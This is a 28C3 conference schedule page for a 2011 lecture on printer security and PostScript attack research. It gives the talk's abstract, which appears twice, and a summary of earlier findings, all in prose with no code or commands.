28C3 - Version 2.3.5

28th Chaos Communication Congress
Behind Enemy Lines

Speakers
Andrei Costin
Schedule
Day Day 2 - 2011-12-28
Room Saal 1
Start time 17:15
Duration 01:00
Info
ID 4871
Event type Lecture
Track Hacking
Language used for presentation English
Feedback

Hacking MFPs

Part2 - PostScript: Um, you've been hacked

We have decided to continue our research onto PostScript realms - an old, very powerful and nicely designed programming language, where (as a coincidence or not, given it's numerous security flaws) Adobe owns most PostScript interpreters instances.

This time we demonstrate that PostScript language, given it's power, elegance and Turing-completeness, can be used more than just for drawing dots, lines and circles - and to a certain extent it can be a hacker's sweet delight if fully mastered.

We will be presenting a real-life implementation of unusual PostScript APIs (along with it's dissection and reconstructed documentation) that interact with various levels of OS and HW, implementation we have found in a TOP10 printer vendor product line.

Also, we will investigate whether a PostScript-based (hence platform-independent) virus (18+ years after first proposals of such theory) can be acomplished, thus giving theoretical hints and few building blocks in this direction.

We will also present some very constructive uses of the PostScript language in the creative (i.e. non-destructive) hacking direction.

In the end, we will try to summarize our conclusions and possible solution for all parties involved (vendors, users, sysadmins, security experts).

With this research we hope we can prove that entire printer industry (devices, printing software/drivers/subsystems, publishing and managed services) have to be rethought security-wise, so that it can withstand in the long run the current security landscape and threats.

"Hacking MFPs (part2) - PostScript: Um, you've been hacked"

We started our research in early 2010 as a state-of-affairs investigation of the general security related to printers and printing protocols&subsystem.

We have concluded and demonstrated that using malicious documents and applets, it is possible using the PJL protocol to control certain printer functionality, including malicious content upload/download on printers' storage.

As a side effect of the research, several other directions in printers' industry shown prone to malicious attacks (XSS injection and execution, auth-bypass, unauthorized functionality and content access, etc.)

Incidentally, very same period, Stuxnet abused printing subsystems to spread itself and few other printer researches emerged in various directions (PJL password and hard disk abuse, confidential/password data harvesting, Linux-based firmware rev-eng).

All these apparently separate events, just come to prove once again that printers are not forgotten, they spark revived hacking interest and their (mis)use can be harmful and have long-standing effects on one's eneterprise security.

============================================

We have decided to continue our research onto PostScript realms - an old, very powerful and nicely designed programming language, where (as a coincidence or not, given it's numerous security flaws) Adobe owns most PostScript interpreters instances.

This time we demonstrate that PostScript language, given it's power, elegance and Turing-completeness, can be used more than just for drawing dots, lines and circles - and to a certain extent it can be a hacker's sweet delight if fully mastered.

We will be presenting a real-life implementation of unusual PostScript APIs (along with it's dissection and reconstructed documentation) that interact with various levels of OS and HW, implementation we have found in a TOP10 printer vendor product line.

Also, we will investigate whether a PostScript-based (hence platform-independent) virus (18+ years after first proposals of such theory) can be acomplished, thus giving theoretical hints and few building blocks in this direction.

We will also present some very constructive uses of the PostScript language in the creative (i.e. non-destructive) hacking direction.

In the end, we will try to summarize our conclusions and possible solution for all parties involved (vendors, users, sysadmins, security experts).

With this research we hope we can prove that entire printer industry (devices, printing software/drivers/subsystems, publishing and managed services) have to be rethought security-wise, so that it can withstand in the long run the current security landscape and threats.